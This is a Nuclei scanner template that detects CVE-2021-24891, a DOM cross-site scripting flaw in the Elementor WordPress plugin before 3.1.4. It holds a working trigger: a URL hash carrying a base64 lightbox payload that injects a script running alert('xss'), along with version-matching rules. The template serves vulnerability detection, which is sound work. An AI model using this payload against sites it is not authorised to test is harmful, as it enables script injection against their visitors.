id: CVE-2021-24891 info: name: WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting author: dhiyaneshDk severity: medium description: | WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash. reference: - https://www.jbelamor.com/xss-elementor-lightox.html - https://wpscan.com/vulnerability/fbed0daa-007d-4f91-8d87-4bca7781de2d - https://nvd.nist.gov/vuln/detail/CVE-2021-24891 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24891 cwe-id: CWE-79 epss-score: 0.00116 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 framework: wordpress vendor: elementor product: website_builder tags: wordpress,wp-plugin,elementor,wpscan,cve,cve2021,dom,xss http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js" - "{{BaseURL}}/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9" req-condition: true matchers-condition: and matchers: - type: dsl dsl: - compare_versions(version, '> 1.5.0', '< 3.1.4') && status_code_1 == 200 && status_code_2 == 200 - type: regex part: body_1 regex: - "elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)" extractors: - type: regex name: version group: 1 regex: - "elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)" internal: true - type: kval kval: - version